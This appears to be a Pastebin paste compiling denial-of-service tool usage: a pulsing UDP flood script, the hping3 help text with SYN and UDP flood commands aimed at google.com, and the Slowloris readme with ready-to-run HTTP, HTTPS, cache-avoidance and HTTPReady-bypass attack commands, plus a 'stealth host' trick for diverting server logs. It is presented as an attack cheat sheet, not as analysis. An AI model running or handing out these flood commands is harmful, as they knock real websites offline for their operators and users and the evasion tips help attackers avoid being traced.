Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- perl slowloris.pl
- mt_pulse.pl
- SIMPLE PULSING UDP FLOOD
- USAGE: ./mt_pulse.pl A B
- A: KBPS to pulse (set to your upstream for best result)
- B: Target host or IP. (eg. radicalsroar.com OR 127.0.0.1)
- cd pentbox
- ruby pentbox.rb
- cd hydra/
- cd nikto/nikto.pl
- hping3
- Usage
- Regardless of which Hping you get, the command to flood a target is as follows:
- hping[2 or 3] [TARGET] -p [PORT] --flood [PACKET TYPE] [OTHER OPTIONS]
- You can read the manpage for hping by typing
- man hping[2 or 3]
- Or you can invoke help menu with the --help arg
- root@thegame:~# hping3 --help
- usage: hping3 host [options]
- -h --help show this help
- -v --version show version
- -c --count packet count
- -i --interval wait (uX for X microseconds, for example -i u1000)
- --fast alias for -i u10000 (10 packets for second)
- --faster alias for -i u1000 (100 packets for second)
- --flood sent packets as fast as possible. Don't show replies.
- -n --numeric numeric output
- -q --quiet quiet
- -I --interface interface name (otherwise default routing interface)
- -V --verbose verbose mode
- -D --debug debugging info
- -z --bind bind ctrl+z to ttl (default to dst port)
- -Z --unbind unbind ctrl+z
- --beep beep for every matching packet received
- Mode
- default mode TCP
- -0 --rawip RAW IP mode
- -1 --icmp ICMP mode
- -2 --udp UDP mode
- -8 --scan SCAN mode.
- Example: hping --scan 1-30,70-90 -S www.target.host
- -9 --listen listen mode
- IP
- -a --spoof spoof source address
- --rand-dest random destionation address mode. see the man.
- --rand-source random source address mode. see the man.
- -t --ttl ttl (default 64)
- -N --id id (default random)
- -W --winid use win* id byte ordering
- -r --rel relativize id field (to estimate host traffic)
- -f --frag split packets in more frag. (may pass weak acl)
- -x --morefrag set more fragments flag
- -y --dontfrag set dont fragment flag
- -g --fragoff set the fragment offset
- -m --mtu set virtual mtu, implies --frag if packet size > mtu
- -o --tos type of service (default 0x00), try --tos help
- -G --rroute includes RECORD_ROUTE option and display the route buffer
- --lsrr loose source routing and record route
- --ssrr strict source routing and record route
- -H --ipproto set the IP protocol field, only in RAW IP mode
- ICMP
- -C --icmptype icmp type (default echo request)
- -K --icmpcode icmp code (default 0)
- --force-icmp send all icmp types (default send only supported types)
- --icmp-gw set gateway address for ICMP redirect (default 0.0.0.0)
- --icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)
- --icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)
- --icmp-help display help for others icmp options
- UDP/TCP
- -s --baseport base source port (default random)
- -p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
- -k --keep keep still source port
- -w --win winsize (default 64)
- -O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)
- -Q --seqnum shows only tcp sequence number
- -b --badcksum (try to) send packets with a bad IP checksum
- many systems will fix the IP checksum sending the packet
- so you'll get bad UDP/TCP checksum instead.
- -M --setseq set TCP sequence number
- -L --setack set TCP ack
- -F --fin set FIN flag
- -S --syn set SYN flag
- -R --rst set RST flag
- -P --push set PUSH flag
- -A --ack set ACK flag
- -U --urg set URG flag
- -X --xmas set X unused flag (0x40)
- -Y --ymas set Y unused flag (0x80)
- --tcpexitcode use last tcp->th_flags as exit code
- --tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime
- Common
- -d --data data size (default is 0)
- -E --file data from file
- -e --sign add 'signature'
- -j --dump dump packets in hex
- -J --print dump printable characters
- -B --safe enable 'safe' protocol
- -u --end tell you when --file reached EOF and prevent rewind
- -T --traceroute traceroute mode (implies --bind and --ttl 1)
- --tr-stop Exit when receive the first not ICMP in traceroute mode
- --tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop
- --tr-no-rtt Don't calculate/show RTT information in traceroute mode
- ARS packet description (new, unstable)
- --apd-send Send the packet described with APD (see docs/APD.txt)
- Examples
- SYN flood google.com's port 80
- hping2 google.com -p 80 -i u30000 -S
- UDP flood google.com:
- hping3 google.com -p 80 -i u30000 --udp
- slowloris
- Perl slowloris.pl
- If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
- Testing Example:
- ./slowloris.pl -dns www.example.com -port 80 -test
- This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you
- really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that
- unless you know what you're doing).
- HTTP DoS
- Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know
- that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the
- timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets.
- Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration.
- Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other
- sockets that are in use become available - this would be solved by threading, but that's for a future revision.
- The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries
- (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's
- successful or not though.
- HTTP DoS Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
- HTTPReady Bypass
- HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a
- POST verses a GET or HEAD request with the -httpready switch.
- HTTPReady Bypass Example
- ./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
- If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a
- seperate virtual host using the -shost variable. This way the logs that are created will go to a different
- virtual host log file, but only if they are kept separately.
- Stealth Host DoS Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
- HTTPS DoS
- Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular
- option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few
- tests I performed during the early phases of development. Your mileage may vary.
- HTTPS DoS Example:
- ./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
- HTTP Cache
- Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may
- look at the request path part of the header, but by sending different requests each time you can abuse more
- resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
- HTTP Cache Example:
- ./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
- Issues
- Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar
- devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most
- likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted,
- although only Netscalar has been tested.
- Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets
- (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is
- typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you
- may have trouble taking down a larger site with just one machine, depending on their architecture.
- For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's
- probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small
- number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably
- running into this "feature" of modern operating systems. Either way, this program seems to work best if run from
- FreeBSD.
- Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the
- web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets
- remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up
- next to one another. You will probably be easy to find if anyone is looking at their logs at that point -
- although the DoS will be over by that point too.
- What is a slow loris?
- What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous.
- Check this out:
- http://www.youtube.com/watch?v=rLdQ3UhLoD4
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement